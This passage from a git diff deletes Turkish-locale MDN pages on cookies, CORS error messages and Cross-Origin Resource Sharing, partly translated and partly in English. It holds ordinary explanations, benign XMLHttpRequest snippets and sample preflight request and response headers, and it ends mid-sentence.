href="https://wikimediafoundation.org/wiki/Cookie_statement">cookie statement</a>.</p> - -<h3 id="Do-Not-Track">Do-Not-Track</h3> - -<p>There are no legal or technological requirements for its use, but the {{HTTPHeader("DNT")}} header can be used to signal that a web application should disable either its tracking or cross-site user tracking of an individual user. See the {{HTTPHeader("DNT")}} header for more information.</p> - -<h3 id="EU_cookie_directive">EU cookie directive</h3> - -<p>Requirements for cookies across the EU are defined in <a href="http://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX:32009L0136">Directive 2009/136/EC</a> of the European Parliament and came into effect on 25 May 2011. A directive is not a law by itself, but a requirement for EU member states to put laws in place that meet the requirements of the directive. The actual laws can differ from country to country.</p> - -<p>In short the EU directive means that before somebody can store or retrieve any information from a computer, mobile phone or other device, the user must give informed consent to do so. Many websites have added banners (AKA "cookie banners") since then to inform the user about the use of cookies.</p> - -<p>For more, see <a href="https://en.wikipedia.org/wiki/HTTP_cookie#EU_cookie_directive">this Wikipedia section</a> and consult state laws for the latest and most accurate information.</p> - -<h3 id="Zombie_cookies_and_Evercookies">Zombie cookies and Evercookies</h3> - -<p>A more radical approach to cookies are zombie cookies or "Evercookies" which are recreated after their deletion and are intentionally hard to delete forever. They are using the <a href="/en-US/docs/Web/API/Web_Storage_API" title="DOM Storage">Web storage API</a>, Flash Local Shared Objects and other techniques to recreate themselves whenever the cookie's absence is detected.</p> - -<ul> - <li><a href="https://github.com/samyk/evercookie">Evercookie by Samy Kamkar</a></li> - <li><a href="https://en.wikipedia.org/wiki/Zombie_cookie">Zombie cookies on Wikipedia</a></li> -</ul> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li>{{HTTPHeader("Set-Cookie")}}</li> - <li>{{HTTPHeader("Cookie")}}</li> - <li>{{domxref("Document.cookie")}}</li> - <li>{{domxref("Navigator.cookieEnabled")}}</li> - <li><a href="/tr/docs/Tools/Storage_Inspector">Inspecting cookies using the Storage Inspector</a></li> - <li><a class="external" href="https://tools.ietf.org/html/rfc6265">Cookie tanımı: RFC 6265</a></li> - <li><a href="https://en.wikipedia.org/wiki/HTTP_cookie">Wikipedia'da HTTP çerezi</a></li> -</ul> diff --git a/files/tr/web/http/cors/errors/corsrequestnothttp/index.html b/files/tr/web/http/cors/errors/corsrequestnothttp/index.html deleted file mode 100644 index b11ef3fd36..0000000000 --- a/files/tr/web/http/cors/errors/corsrequestnothttp/index.html +++ /dev/null @@ -1,31 +0,0 @@ ---- -title: 'Reason: CORS request not HTTP' -slug: Web/HTTP/CORS/Errors/CORSRequestNotHttp -tags: - - Güvenlik - - Hata - - Mesajlar - - Sebepler - - konsol -translation_of: Web/HTTP/CORS/Errors/CORSRequestNotHttp ---- -<div>{{HTTPSidebar}}</div> - -<h2 id="Sebep">Sebep</h2> - -<pre class="syntaxbox">Sebep: CORS isteği HTTP değil</pre> - -<h2 id="Yanlış_giden_ne">Yanlış giden ne?</h2> - -<p>{{Glossary("CORS")}} istekleri yalnızca HTTPS URL şemasını kullanabilir, ancak istek tarafından belirtilen URL farklı türdedir. Bu genellikle URL <code>file:///</code> kullanarak yerel bir dosya belirtirse olur.</p> - -<p>Bu sorunu çözmek için, CORS içeren isteklerde bulunurken HTTPS URL'leri kullandığınızdan emin olun.</p> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors">CORS hataları</a></li> - <li>Sözlük: {{Glossary("CORS")}}</li> - <li><a href="/en-US/docs/Web/HTTP/CORS">CORS'a giriş</a></li> - <li><a href="/en-US/docs/Learn/Common_questions/What_is_a_URL">URL nedir?</a></li> -</ul> diff --git a/files/tr/web/http/cors/errors/index.html b/files/tr/web/http/cors/errors/index.html deleted file mode 100644 index d1dd12dc75..0000000000 --- a/files/tr/web/http/cors/errors/index.html +++ /dev/null @@ -1,76 +0,0 @@ ---- -title: CORS errors -slug: Web/HTTP/CORS/Errors -tags: - - CORS - - Errors - - HTTP - - HTTPS - - Messages - - NeedsTranslation - - Same-origin - - Security - - TopicStub - - console - - troubleshooting -translation_of: Web/HTTP/CORS/Errors ---- -<div>{{HTTPSidebar}}</div> - -<p><span class="seoSummary"><a href="/en-US/docs/Web/HTTP/CORS">Cross-Origin Resource Sharing</a> ({{Glossary("CORS")}}) is a standard that allows a server to relax the <a href="/en-US/docs/Web/Security/Same-origin_policy">same-origin policy</a>. This is used to explicitly allow some cross-origin requests while rejecting others.</span> For example, if a site offers an embeddable service, it may be necessary to relax certain restrictions. Setting up such a CORS configuration isn't necessarily easy and may present some challenges. In these pages, we'll look into some common CORS error messages and how to resolve them.</p> - -<p>If the CORS configuration isn't setup correctly, the browser console will present an error like <code>"Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at $somesite"</code> indicating that the request was blocked due to violating the CORS security rules. This might not necessarily be a set-up mistake, though. It's possible that the request is in fact intentionally being disallowed by the user's web application and remote external service. However, If the endpoint is meant to be available, some debugging is needed to succeed.</p> - -<h2 id="Identifying_the_issue">Identifying the issue</h2> - -<p>To understand the underlying issue with the CORS configuration, you need to find out which request is at fault and why. These steps may help you do so:</p> - -<ol> - <li>Navigate to the web site or web app in question and open the <a href="/en-US/docs/Tools">Developer Tools</a>.</li> - <li>Now try to reproduce the failing transaction and check the <a href="/en-US/docs/Tools/Web_Console">console</a> if you are seeing a CORS violation error message. It will probably look like this:</li> -</ol> - -<p><img alt="Firefox console showing CORS error" src="https://mdn.mozillademos.org/files/16050/cors-error2.png"></p> - -<p>The text of the error message will be something similar to the following:</p> - -<pre>Cross<span class="message-body-wrapper"><span class="message-flex-body"><span class="devtools-monospace message-body">-Origin Request Blocked: The Same Origin Policy disallows -reading the remote resource at <em>https://some-url-here</em>. (<em>Reason: -additional information here</em>).</span></span></span></pre> - -<div class="note"> -<p><span class="message-body-wrapper"><span class="message-flex-body"><span class="devtools-monospace message-body"><strong>Note:</strong> For security reasons, specifics about what went wrong with a CORS request <em>are not available to JavaScript code</em>. All the code knows is that an error occurred. The only way to determine what specifically went wrong is to look at the browser's console for details.</span></span></span></p> -</div> - -<h2 id="CORS_error_messages">CORS error messages</h2> - -<p>Firefox's console displays messages in its console when requests fail due to CORS. Part of the error text is a "reason" message that provides added insight into what went wrong. The reason messages are listed below; click the message to open an article explaining the error in more detail and offering possible solutions.</p> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSDisabled">Reason: CORS disabled</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSDidNotSucceed">Reason: CORS request did not succeed</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSOriginHeaderNotAdded">Reason: CORS header ‘Origin’ cannot be added</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSExternalRedirectNotAllowed">Reason: CORS request external redirect not allowed</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSRequestNotHttp">Reason: CORS request not http</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMissingAllowOrigin">Reason: CORS header ‘Access-Control-Allow-Origin’ missing</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSAllowOriginNotMatchingOrigin">Reason: CORS header ‘Access-Control-Allow-Origin’ does not match ‘xyz’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials">Reason: Credential is not supported if the CORS header ‘Access-Control-Allow-Origin’ is ‘*’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMethodNotFound">Reason: Did not find method in CORS header ‘Access-Control-Allow-Methods’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMissingAllowCredentials">Reason: expected ‘true’ in CORS header ‘Access-Control-Allow-Credentials’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSPreflightDidNotSucceed">Reason: CORS preflight channel did not succeed</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSInvalidAllowMethod">Reason: invalid token ‘xyz’ in CORS header ‘Access-Control-Allow-Methods’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSInvalidAllowHeader">Reason: invalid token ‘xyz’ in CORS header ‘Access-Control-Allow-Headers’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMissingAllowHeaderFromPreflight">Reason: missing token ‘xyz’ in CORS header ‘Access-Control-Allow-Headers’ from CORS preflight channel</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMultipleAllowOriginNotAllowed">Reason: Multiple CORS header ‘Access-Control-Allow-Origin’ not allowed</a></li> -</ul> - -<h2 id="See_also">See also</h2> - -<ul> - <li>Glossary: {{Glossary("CORS")}}</li> - <li><a href="/en-US/docs/Web/HTTP/CORS">CORS introduction</a></li> - <li><a href="/en-US/docs/Web/HTTP/Server-Side_Access_Control">Server-side CORS settings</a></li> - <li><a href="/en-US/docs/Web/HTML/CORS_enabled_image">CORS enabled image</a></li> - <li><a href="/en-US/docs/Web/HTML/CORS_settings_attributes">CORS settings attributes</a></li> - <li><a href="https://www.test-cors.org">https://www.test-cors.org</a> – page to test CORS requests</li> -</ul> diff --git a/files/tr/web/http/cors/index.html b/files/tr/web/http/cors/index.html deleted file mode 100644 index 2e7e690ab7..0000000000 --- a/files/tr/web/http/cors/index.html +++ /dev/null @@ -1,556 +0,0 @@ ---- -title: Cross-Origin Resource Sharing (CORS) -slug: Web/HTTP/CORS -translation_of: Web/HTTP/CORS ---- -<p><span class="seoSummary">Farklı Merkezler Arası Kaynak Paylaşımı (Yaygın olarak bilinen adıyla -</span>Cross-Origin Resource Sharing <span class="seoSummary">({{Glossary("CORS")}}) ) ek {{Glossary("HTTP")}} başlıkları (header)</span> kullanarak tarayıcıyla iletişime geçer ve farklı merkezler arasında gerçekleşen kaynak paylaşımı sırasında kaynak talep eden tarafın, kaynak sağlayan tarafça istenen izinlere sahip olup olmadığını tarayıcıya bildirir. Peki CORS ne zaman gerçekleşir. Hangi durumlarda merkezin farklı olduğu kabul edilir ? Bunu kısaca şöyle açıklayabiliriz, veri isteğinde bulunan taraf ile veri sağlayan taraflar arasında alan adı, protokol veya port farkı varsa tarafların farklı merkezlerde yer aldığı kabul edilmektedir.</p> - -<p>Olayı daha açık bir şekilde anlamak için aşağıdaki örneğe göz atalım. Aşağıda iki farklı merkez arasında veri paylaşımı gerçekleşmektedir.</p> - -<p><code>http://domain-a.com</code> uzantılı bir web sitemizin olduğunu ve sitemizde yer alan bazı modüllerin çalışması için <code>http://api.domain-b.com/data.json</code> sitesine ait API servisininden {{domxref("XMLHttpRequest")}} oluşturarak veri çektğimizi varsayalım. Burada doğrudan iki farklı domain söz konusu olduğu için, doğal olarak yaptığınız bu veri talebi tarayıcılar tarafından <strong>Farklı Kaynaklar Arası Veri Paylaşımı </strong>olarak görülecek ve isteğiniz bu bağlamda muamele görecektir.</p> - -<p>Güvenlik önemleri nedeniyle tarayıcılar farklı merkezler arasında yapılan HTTP isteklerini engellemektedir. Keza veri transferi amacıyla kullandığımız <code>XMLHttpRequest</code> ve <a href="/en-US/docs/Web/API/Fetch_API">Fetch API</a> tek merkez politikasına (<a href="/en-US/docs/Web/Security/Same-origin_policy">same-origin policy</a>) tabidirler. Dolayısıyla bir XMLHttpRequest oluşturduğunuzda veya Fetch API kullandığınızda eğer hedef siteniz ile veri trasferinde bulunmak için gerekli başlıklara (header) sahip değilseniz, tek merkez politikası nedeniyle gönderdiğiniz bu istekler tarayıcılar tarafından engellenecektir.</p> - -<p>Ancak istisnai olarak bazı web servislerinde bütün merkezler ile veri paylaşımı kabul edilmiş olabilir, herhangi bir kısıtlama olmayabilir, bu gibi servisler ile çalışırken herhangi bir ek başlığa sahip olmasanız dahi CORS hatası almaksızın, bu servisler ile veri transferinde bulunabilirsiniz.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/14295/CORS_principle.png" style="height: 305px; width: 440px;"></p> - -<p>CORS mekanizması tarayıcılar ve web servisleri arasında güvenli farklı merkezli istekleri ve veri transferlerini desteklemektedir .Modern tarayıcılar Farklı Merkezler Arası Kaynak Paylaşımı sistemini XMLHttpReqest ve Fetch gibi yapılar ile birlikte kullanarak, farklı merkezler arasında yapılan http isteklerini daha güvenli hale getirmeye çalışmaktadır. </p> - -<h2 id="Bu_makaleyi_kimler_okumalı">Bu makaleyi kimler okumalı?</h2> - -<p>Gerçekten herkes okumalı.</p> - -<p>Daha özelde, bu makale web adminleri, sunucu geliştiricileri ve front-end geliştiricileri içindir. Modern tarayıcılar, başlıklar ve poliçe uygulamaları dahil olmak üzere çapraz kaynak paylaşımının istemci tarafı bileşenlerini işler. Ancak bu yeni standart, sunucuların yeni request ve response headerlarını işlemesi gerektiği anlamına gelir. Diğer makale <a href="/en-US/docs/Web/HTTP/Server-Side_Access_Control">çapraz-köken paylaşımını sunucu perspektifinden (PHP kod parçacıklarıyla)</a> tartışan sunucu geliştiricileri için tamamlayıcı bir okumadır.</p> - -<h2 id="Hangi_istekler_CORS_kullanır">Hangi istekler CORS kullanır?</h2> - -<p>Bu <a class="external" href="https://fetch.spec.whatwg.org/#http-cors-protocol">çapraz-köken paylaşma standardı</a> siteler arası HTTP isteklerini etkinleştirmek için kullanılır:</p> - -<ul> - <li>Yukarıda tartışıldığı gibi {{domxref("XMLHttpRequest")}} veya <a href="/en-US/docs/Web/API/Fetch_API">Fetch API'lerinin</a> çağrıları.</li> - <li>Web Fontları (CSS içindeki <code>@font-face</code> içinde çapraz-domain font kullanımı için), <a class="external" href="https://www.w3.org/TR/css-fonts-3/#font-fetching-requirements">böylece sunucular yalnızca izin verilen web siteleri tarafından siteler arası yüklenebilen ve kullanılabilen TrueType fontları dağıtabilir.</a></li> - <li><a href="/en-US/docs/Web/API/WebGL_API/Tutorial/Using_textures_in_WebGL">WebGL texture'ları</a>.</li> - <li>{{domxref("CanvasRenderingContext2D.drawImage()", "drawImage()")}} kullanılarak bir tuvale çizilen resimler/video çerçeveleri.</li> - <li><a href="https://wiki.developer.mozilla.org/en-US/docs/Web/CSS/CSS_Shapes/Shapes_From_Images">Resimlerden CSS şekilleri. </a></li> -</ul> - -<p>Bu makale, Çapraz-Köken Arası Kaynak Paylaşımı hakkında genel bir tartışmadır ve gerekli HTTP headerlarının bir tartışmasını içerir.</p> - -<h2 id="Fonksiyonel_genel_bakış">Fonksiyonel genel bakış</h2> - -<p>Çapraz-Köken Kaynak Paylaşımı standardı, hangi originlerin bir web tarayıcısından istenilen bilgiyi okumalarına izin verildiğini sunucuların tanımlamasına izin veren yeni <a href="/en-US/docs/Web/HTTP/Headers">HTTP headerlarını</a> ekleyerek çalışır. Ayrıca, sunucu verileri üzerinde yan etkilere neden olabilecek HTTP istek yöntemleri için (özellikle, {{HTTPMethod ("GET")}} veya {{HTTPMethod ("POST")}} dışında belirli <a href="/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types">MIME tiplerindeki</a> HTTP yöntemleri), şartname, tarayıcıların HTTP {{HTTPMethod ("OPTIONS")}} istek yöntemiyle desteklenen yöntemleri sunucudan talep ederek isteği "preflight" ve ardından sunucudan "approval" aldıktan sonra asıl isteği göndermesini zorunlu kılar. Sunucular ayrıca istemcilere "credentials"(<a href="/en-US/docs/Web/HTTP/Cookies">Cookie'ler</a> ve <a href="https://wiki.developer.mozilla.org/en-US/docs/Web/HTTP/Authentication">HTTP kimlik doğrulama</a> verileri dahil) bilgisinin istekler ile gönderilip gönderilmeyeceğini bildirebilir.</p> - -<p>CORS başarısızlıkları hatalara neden olur, ancak güvenlik sebepleri için hata ile ilgili ayrıntılar <em>JavaScript tarafından erişilemez</em>. Kodun bildiği tek şey bir hata oluşmasıdır. Özellikle neyin yanlış gittiğini belirlemenin tek yolu, ayrıntılar için tarayıcının konsoluna bakmaktır.</p> - -<p>Sonraki bölümler senaryoları tartışır ve kullanılan HTTP headerlarının analizini sağlar.</p> - -<h2 id="Examples_of_access_control_scenarios">Examples of access control scenarios</h2> - -<p>Here, we present three scenarios that illustrate how Cross-Origin Resource Sharing works. All of these examples use the {{domxref("XMLHttpRequest")}} object, which can be used to make cross-site invocations in any supporting browser.</p> - -<p>The JavaScript snippets included in these sections (and running instances of the server-code that correctly handles these cross-site requests) can be found "in action" at <a class="external" href="http://arunranga.com/examples/access-control/">http://arunranga.com/examples/access-control/</a>, and will work in browsers that support cross-site <code>XMLHttpRequest</code>.</p> - -<p>A discussion of Cross-Origin Resource Sharing from a server perspective (including PHP code snippets) can be found in the <a class="internal" href="/en-US/docs/Web/HTTP/Server-Side_Access_Control">Server-Side Access Control (CORS)</a> article.</p> - -<h3 id="Simple_requests">Simple requests</h3> - -<p>Some requests don’t trigger a <a href="#Preflighted_requests">CORS preflight</a>. Those are called “simple requests” in this article, though the {{SpecName('Fetch')}} spec (which defines CORS) doesn’t use that term. A request that doesn’t trigger a <a href="#Preflighted_requests">CORS preflight</a>—a so-called “simple request” — is one that <strong>meets all the following conditions</strong>:</p> - -<ul> - <li>The only allowed methods are: - <ul> - <li>{{HTTPMethod("GET")}}</li> - <li>{{HTTPMethod("HEAD")}}</li> - <li>{{HTTPMethod("POST")}}</li> - </ul> - </li> - <li>Apart from the headers set automatically by the user agent (for example, {{HTTPHeader("Connection")}}, {{HTTPHeader("User-Agent")}}, or <a href="https://fetch.spec.whatwg.org/#forbidden-header-name">any of the other headers with names defined in the Fetch spec as a “forbidden header name”</a>), the only headers which are allowed to be manually set are <a href="https://fetch.spec.whatwg.org/#cors-safelisted-request-header">those which the Fetch spec defines as being a “CORS-safelisted request-header”</a>, which are: - <ul> - <li>{{HTTPHeader("Accept")}}</li> - <li>{{HTTPHeader("Accept-Language")}}</li> - <li>{{HTTPHeader("Content-Language")}}</li> - <li>{{HTTPHeader("Content-Type")}} (but note the additional requirements below)</li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#dpr">DPR</a></code></li> - <li>{{HTTPHeader("Downlink")}}</li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#save-data">Save-Data</a></code></li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#viewport-width">Viewport-Width</a></code></li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#width">Width</a></code></li> - </ul> - </li> - <li>The only allowed values for the {{HTTPHeader("Content-Type")}} header are: - <ul> - <li><code>application/x-www-form-urlencoded</code></li> - <li><code>multipart/form-data</code></li> - <li><code>text/plain</code></li> - </ul> - </li> - <li>No event listeners are registered on any {{domxref("XMLHttpRequestUpload")}} object used in the request; these are accessed using the {{domxref("XMLHttpRequest.upload")}} property.</li> - <li>No {{domxref("ReadableStream")}} object is used in the request.</li> -</ul> - -<div class="note"><strong>Note:</strong> These are the same kinds of cross-site requests that web content can already issue, and no response data is released to the requester unless the server sends an appropriate header. Therefore, sites that prevent cross-site request forgery have nothing new to fear from HTTP access control.</div> - -<div class="note"><strong>Note:</strong> WebKit Nightly and Safari Technology Preview place additional restrictions on the values allowed in the {{HTTPHeader("Accept")}}, {{HTTPHeader("Accept-Language")}}, and {{HTTPHeader("Content-Language")}} headers. If any of those headers have ”non-standard” values, WebKit/Safari does not consider the request to meet the conditions for a “simple request”. What WebKit/Safari considers “non-standard” values for those headers is not documented except in the following WebKit bugs: <a href="https://bugs.webkit.org/show_bug.cgi?id=165178" rel="nofollow noreferrer">Require preflight for non-standard CORS-safelisted request headers Accept, Accept-Language, and Content-Language</a>, <a href="https://bugs.webkit.org/show_bug.cgi?id=165566" rel="nofollow noreferrer">Allow commas in Accept, Accept-Language, and Content-Language request headers for simple CORS</a>, and <a href="https://bugs.webkit.org/show_bug.cgi?id=166363" rel="nofollow noreferrer">Switch to a blacklist model for restricted Accept headers in simple CORS requests</a>. No other browsers implement those extra restrictions, because they’re not part of the spec.</div> - -<p>For example, suppose web content on domain <code class="plain">http://foo.example</code> wishes to invoke content on domain <code class="plain">http://bar.other</code>. Code of this sort might be used within JavaScript deployed on foo.example:</p> - -<pre class="brush: js" id="line1">const invocation = new XMLHttpRequest(); -const url = 'http://bar.other/resources/public-data/'; - -function callOtherDomain() { - if(invocation) { - invocation.open('GET', url, true); - invocation.onreadystatechange = handler; - invocation.send(); - } -} -</pre> - -<p>This will lead to a simple exchange between the client and the server, using CORS headers to handle the privileges:</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/14293/simple_req.png" style="height: 224px; width: 521px;"></p> - -<p>Let us look at what the browser will send to the server in this case, and let's see how the server responds:</p> - -<pre class="brush: shell;highlight:[10,16]">GET /resources/public-data/ HTTP/1.1 -Host: bar.other -User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Connection: keep-alive -Referer: http://foo.example/examples/access-control/simpleXSInvocation.html -Origin: http://foo.example - - -HTTP/1.1 200 OK -Date: Mon, 01 Dec 2008 00:23:53 GMT -Server: Apache/2.0.61 -Access-Control-Allow-Origin: * -Keep-Alive: timeout=2, max=100 -Connection: Keep-Alive -Transfer-Encoding: chunked -Content-Type: application/xml - -[XML Data] -</pre> - -<p>Lines 1 - 10 are headers sent. The main HTTP request header of note here is the {{HTTPHeader("Origin")}} header on line 10 above, which shows that the invocation is coming from content on the domain <code class="plain">http://foo.example</code>.</p> - -<p>Lines 13 - 22 show the HTTP response from the server on domain <code class="plain">http://bar.other</code>. In response, the server sends back an {{HTTPHeader("Access-Control-Allow-Origin")}} header, shown above in line 16. The use of the {{HTTPHeader("Origin")}} header and of {{HTTPHeader("Access-Control-Allow-Origin")}} show the access control protocol in its simplest use. In this case, the server responds with a <code>Access-Control-Allow-Origin: *</code> which means that the resource can be accessed by <strong>any</strong> domain in a cross-site manner. If the resource owners at <code class="plain">http://bar.other</code> wished to restrict access to the resource to requests only from <code class="plain">http://foo.example</code>, they would send back:</p> - -<p><code class="plain">Access-Control-Allow-Origin: http://foo.example</code></p> - -<p>Note that now, no domain other than <code class="plain">http://foo.example</code> (identified by the ORIGIN: header in the request, as in line 10 above) can access the resource in a cross-site manner. The <code>Access-Control-Allow-Origin</code> header should contain the value that was sent in the request's <code>Origin</code> header.</p> - -<h3 id="Preflighted_requests">Preflighted requests</h3> - -<p>Unlike <a href="#Simple_requests">“simple requests” (discussed above)</a>, "preflighted" requests first send an HTTP request by the {{HTTPMethod("OPTIONS")}} method to the resource on the other domain, in order to determine whether the actual request is safe to send. Cross-site requests are preflighted like this since they may have implications to user data.</p> - -<p>In particular, a request is preflighted if <strong>any of the following conditions</strong> is true:</p> - -<ul> - <li><strong>If</strong> the request uses any of the following methods: - - <ul> - <li>{{HTTPMethod("PUT")}}</li> - <li>{{HTTPMethod("DELETE")}}</li> - <li>{{HTTPMethod("CONNECT")}}</li> - <li>{{HTTPMethod("OPTIONS")}}</li> - <li>{{HTTPMethod("TRACE")}}</li> - <li>{{HTTPMethod("PATCH")}}</li> - </ul> - </li> - <li><strong>Or if</strong>, apart from the headers set automatically by the user agent (for example, {{HTTPHeader("Connection")}}, {{HTTPHeader("User-Agent")}}, or <a href="https://fetch.spec.whatwg.org/#forbidden-header-name">any of the <strong>OTHER</strong> header with a name defined in the Fetch spec as a “forbidden header name”</a>), the request includes any headers other than <a href="https://fetch.spec.whatwg.org/#cors-safelisted-request-header">those which the Fetch spec defines as being a “CORS-safelisted request-header”</a>, which are the following: - <ul> - <li>{{HTTPHeader("Accept")}}</li> - <li>{{HTTPHeader("Accept-Language")}}</li> - <li>{{HTTPHeader("Content-Language")}}</li> - <li>{{HTTPHeader("Content-Type")}} (but note the additional requirements below)</li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#dpr">DPR</a></code></li> - <li>{{HTTPHeader("Downlink")}}</li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#save-data">Save-Data</a></code></li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#viewport-width">Viewport-Width</a></code></li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#width">Width</a></code></li> - </ul> - </li> - <li><strong>Or if</strong> the {{HTTPHeader("Content-Type")}} header has a value <strong>OTHER THAN</strong> the following: - <ul> - <li><code>application/x-www-form-urlencoded</code></li> - <li><code>multipart/form-data</code></li> - <li><code>text/plain</code></li> - </ul> - </li> - <li><strong>Or if</strong> one or more event listeners are registered on an {{domxref("XMLHttpRequestUpload")}} object used in the request.</li> - <li><strong>Or if</strong> a {{domxref("ReadableStream")}} object is used in the request.</li> -</ul> - -<div class="note"><strong>Note:</strong> WebKit Nightly and Safari Technology Preview place additional restrictions on the values allowed in the {{HTTPHeader("Accept")}}, {{HTTPHeader("Accept-Language")}}, and {{HTTPHeader("Content-Language")}} headers. If any of those headers have ”non-standard” values, WebKit/Safari preflights the request. What WebKit/Safari considers “non-standard” values for those headers is not documented except in the following WebKit bugs: <a href="https://bugs.webkit.org/show_bug.cgi?id=165178" rel="nofollow noreferrer">Require preflight for non-standard CORS-safelisted request headers Accept, Accept-Language, and Content-Language</a>, <a href="https://bugs.webkit.org/show_bug.cgi?id=165566" rel="nofollow noreferrer">Allow commas in Accept, Accept-Language, and Content-Language request headers for simple CORS</a>, and <a href="https://bugs.webkit.org/show_bug.cgi?id=166363" rel="nofollow noreferrer">Switch to a blacklist model for restricted Accept headers in simple CORS requests</a>. No other browsers implement those extra restrictions, because they’re not part of the spec.</div> - -<p>The following is an example of a request that will be preflighted.</p> - -<pre class="brush: js" id="line1">const invocation = new XMLHttpRequest(); -const url = 'http://bar.other/resources/post-here/'; -const body = '<?xml version="1.0"?><person><name>Arun</name></person>'; - -function callOtherDomain(){ - if(invocation) - { - invocation.open('POST', url, true); - invocation.setRequestHeader('X-PINGOTHER', 'pingpong'); - invocation.setRequestHeader('Content-Type', 'application/xml'); - invocation.onreadystatechange = handler; - invocation.send(body); - } -} - -...... -</pre> - -<p>In the example above, line 3 creates an XML body to send with the <code>POST</code> request in line 8. Also, on line 9, a "customized" (non-standard) HTTP request header is set (<code>X-PINGOTHER: pingpong</code>). Such headers are not part of the HTTP/1.1 protocol, but are generally useful to web applications. Since the request uses a Content-Type of <code>application/xml</code>, and since a custom header is set, this request is preflighted.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/16401/preflight_.png" style="height: 555px; width: 538px;"></p> - -<p>(Note: as described below, the actual POST request does not include the Access-Control-Request-* headers; they are needed only for the OPTIONS request.)</p> - -<p>Let's take a look at the full exchange between client and server. The first exchange is the <em>preflight request/response</em>:</p> - -<pre class="brush: none;highlight:[1,10,11,17-20]">OPTIONS /resources/post-here/ HTTP/1.1 -Host: bar.other -User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Connection: keep-alive -Origin: http://foo.example -Access-Control-Request-Method: POST -Access-Control-Request-Headers: X-PINGOTHER, Content-Type - - -HTTP/1.1 200 OK -Date: Mon, 01 Dec 2008 01:15:39 GMT -Server: Apache/2.0.61 (Unix) -Access-Control-Allow-Origin: http://foo.example -Access-Control-Allow-Methods: POST, GET, OPTIONS -Access-Control-Allow-Headers: X-PINGOTHER, Content-Type -Access-Control-Max-Age: 86400 -Vary: Accept-Encoding, Origin -Content-Encoding: gzip -Content-Length: 0 -Keep-Alive: timeout=2, max=100 -Connection: Keep-Alive -Content-Type: text/plain -</pre> - -<p>Once the preflight request is complete, the real request is sent:</p> - -<pre class="brush: none;">POST /resources/post-here/ HTTP/1.1 -Host: bar.other -User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Connection: keep-alive -X-PINGOTHER: pingpong -Content-Type: text/xml; charset=UTF-8 -Referer: http://foo.example/examples/preflightInvocation.html -Content-Length: 55 -Origin: http://foo.example -Pragma: no-cache -Cache-Control: no-cache - -<?xml version="1.0"?><person><name>Arun</name></person> - - -HTTP/1.1 200 OK -Date: Mon, 01 Dec 2008 01:15:40 GMT -Server: Apache/2.0.61 (Unix) -Access-Control-Allow-Origin: http://foo.example -Vary: Accept-Encoding, Origin -Content-Encoding: gzip -Content-Length: 235 -Keep-Alive: timeout=2, max=99 -Connection: Keep-Alive -Content-Type: text/plain - -[Some GZIP'd payload] -</pre> - -<p>Lines 1 - 12 above represent the preflight request with the {{HTTPMethod("OPTIONS")}} method. The browser determines that it needs to send this based on the request parameters that the JavaScript code snippet above was using, so that the server can respond whether it is acceptable to send the request with the actual request parameters. OPTIONS is an HTTP/1.1 method that is used to determine further information from servers, and is a {{Glossary("safe")}} method, meaning that it can't be used to change the resource. Note that along with the OPTIONS request, two other request headers are sent (lines 10 and 11 respectively):</p> - -<pre class="brush: none">Access-Control-Request-Method: POST -Access-Control-Request-Headers: X-PINGOTHER, Content-Type -</pre> - -<p>The {{HTTPHeader("Access-Control-Request-Method")}} header notifies the server as part of a preflight request that when the actual request is sent, it will be sent with a <code>POST</code> request method. The 